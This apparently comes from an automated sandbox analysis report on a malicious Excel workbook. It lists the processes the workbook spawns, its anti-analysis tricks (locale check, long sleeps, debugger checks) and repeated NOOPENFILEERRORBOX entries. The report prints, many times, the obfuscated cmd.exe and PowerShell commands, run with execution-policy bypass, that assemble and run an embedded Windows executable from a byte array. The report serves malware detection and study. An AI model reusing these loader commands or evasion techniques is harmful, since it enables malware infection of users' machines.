Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )	Jump to behavior

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Document contains an embedded VBA which only executes on specific systems (country or language check)

Show sources

Source: 7362_8164_(2019.2).xls

Stream path '_VBA_PROJECT_CUR/VBA/Sheet1' : Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2360

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

